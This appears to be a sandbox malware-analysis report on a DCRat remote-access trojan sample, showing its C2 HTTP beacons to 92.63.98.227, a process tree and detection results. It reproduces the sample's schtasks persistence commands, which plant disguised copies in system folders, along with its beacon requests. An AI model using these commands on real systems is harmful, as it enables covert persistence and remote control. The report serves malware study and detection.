            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination Port
            41192.168.2.65189092.63.98.22780
            TimestampBytes transferredDirectionData
            Aug 28, 2024 15:33:58.587141037 CEST686OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1
            Accept: */*
            Content-Type: text/plain
            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination Port
            42192.168.2.65189192.63.98.22780
            TimestampBytes transferredDirectionData
            Aug 28, 2024 15:33:59.198673964 CEST686OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1
            Accept: */*
            Content-Type: text/plain
            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination Port
            43192.168.2.65189292.63.98.22780
            TimestampBytes transferredDirectionData
            Aug 28, 2024 15:33:59.796047926 CEST686OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1
            Accept: */*
            Content-Type: text/plain
            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:09:31:55
            Start date:28/08/2024
            Path:C:\Users\user\Desktop\XPC5PMKegV.exe
            Wow64 process (32bit):false
            Commandline:"C:\Users\user\Desktop\XPC5PMKegV.exe"
            Imagebase:0xa30000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2128952828.000000000315F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2128952828.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2128952828.0000000003143000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2129458279.0000000012E6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Reputation:low
            Has exited:true

            General

            Target ID:2
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 9 /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:3
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:4
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 5 /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:5
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Recovery\xMLVfJVxhYAkoCJ.exe
            Wow64 process (32bit):false
            Commandline:C:\Recovery\xMLVfJVxhYAkoCJ.exe
            Imagebase:0xec0000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2209851318.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2209851318.000000000331F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 79%, ReversingLabs
            Reputation:low
            Has exited:true

            General

            Target ID:6
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 11 /tr "'C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe'" /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:7
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:8
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 11 /tr "'C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:9
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:10
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:11
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:12
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe'" /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:13
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:14
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:15
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\microsoft.net\System.exe'" /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:16
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\System.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:17
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft.net\System.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:18
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 10 /tr "'C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe'" /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:19
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:20
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 6 /tr "'C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:21
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe'" /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:22
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:23
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:24
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yrs7rIEeUp.bat"
            Imagebase:0x7ff72c040000
            File size:289'792 bytes
            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:25
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff66e660000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:26
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\w32tm.exe
            Wow64 process (32bit):false
            Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Imagebase:0x7ff71cb50000
            File size:108'032 bytes
            MD5 hash:81A82132737224D324A3E8DA993E2FB5
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:27
            Start time:09:31:58
            Start date:28/08/2024
            Path:C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
            Imagebase:0xd10000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 79%, ReversingLabs
            Has exited:true

            General

            Target ID:28
            Start time:09:31:58
            Start date:28/08/2024
            Path:C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
            Imagebase:0x410000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:29
            Start time:09:31:58
            Start date:28/08/2024
            Path:C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
            Imagebase:0x710000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001D.00000002.2235264042.0000000002981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 79%, ReversingLabs
            Has exited:true

            General

            Target ID:30
            Start time:09:31:58
            Start date:28/08/2024
            Path:C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
            Imagebase:0xa50000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.2230198561.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.2230198561.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Has exited:true

            General

            Target ID:31
            Start time:09:31:59
            Start date:28/08/2024
            Path:C:\Program Files (x86)\Microsoft.NET\System.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\microsoft.net\System.exe"
            Imagebase:0xc90000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001F.00000002.2231952684.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001F.00000002.2231952684.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 79%, ReversingLabs
            Has exited:true

            General

            Target ID:32
            Start time:09:31:59
            Start date:28/08/2024
            Path:C:\Program Files (x86)\Microsoft.NET\System.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\microsoft.net\System.exe"
            Imagebase:0x440000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.2230480855.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Has exited:true

            General

            Target ID:33
            Start time:09:31:59
            Start date:28/08/2024
            Path:C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            Imagebase:0x5b0000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.2231770511.00000000029BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.2231770511.0000000002981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Avira
            • Detection: 100%, Avira
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 100%, Joe Sandbox ML
            • Detection: 100%, Joe Sandbox ML
            • Detection: 100%, Joe Sandbox ML
            • Detection: 79%, ReversingLabs
            Has exited:true

            General

            Target ID:34
            Start time:09:32:02
            Start date:28/08/2024
            Path:C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            Imagebase:0xa10000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.2261381314.0000000002E2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.2261381314.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Has exited:true

            General

            Target ID:35
            Start time:09:32:08
            Start date:28/08/2024
            Path:C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            Imagebase:0xa00000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.2323041315.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.2323041315.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Has exited:true

            General

            Target ID:37
            Start time:09:32:16
            Start date:28/08/2024
            Path:C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
            Imagebase:0x20000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:38
            Start time:09:32:24
            Start date:28/08/2024
            Path:C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
            Imagebase:0x260000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.2457019815.00000000025ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Has exited:true

            General

            Target ID:40
            Start time:09:32:33
            Start date:28/08/2024
            Path:C:\Program Files (x86)\Microsoft.NET\System.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\microsoft.net\System.exe"
            Imagebase:0xc30000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000028.00000002.2520255820.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Has exited:true

            General

            Target ID:41
            Start time:09:32:41
            Start date:28/08/2024
            Path:C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            Imagebase:0x850000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000029.00000002.2635446252.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Has exited:true

            Disassembly

            Reset < >

              Executed Functions

              Function 00007FFD34793565 Relevance: .3, Instructions: 302COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 73355059e11d3a041c181fe50c66e18e1bb43f2f6bd72b774f88bdeb3c05544d
              • Instruction ID: 7ffe181de37c50026b26b338a44a34a88b01d16922b85db5d694724639f74590
              • Opcode Fuzzy Hash: 73355059e11d3a041c181fe50c66e18e1bb43f2f6bd72b774f88bdeb3c05544d
              • Instruction Fuzzy Hash: 2CA17DB1B1894E8EEB94DB68C8657BD7BE1FF9A310F40017AD00DD32D6CBB968018781
              Function 00007FFD3479CAA9 Relevance: .3, Instructions: 260COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
